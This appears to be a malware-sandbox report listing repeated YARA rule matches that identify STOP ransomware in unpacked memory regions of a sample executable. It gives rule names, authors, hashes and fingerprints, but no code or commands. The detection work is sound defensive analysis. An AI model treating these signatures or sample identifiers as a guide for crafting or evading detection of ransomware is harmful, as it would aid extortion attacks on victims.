      Source: 12.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 0.2.bE5aaTiJM0.exe.42715a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.2.bE5aaTiJM0.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 11.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 16.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.2.bE5aaTiJM0.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.10.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.7.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
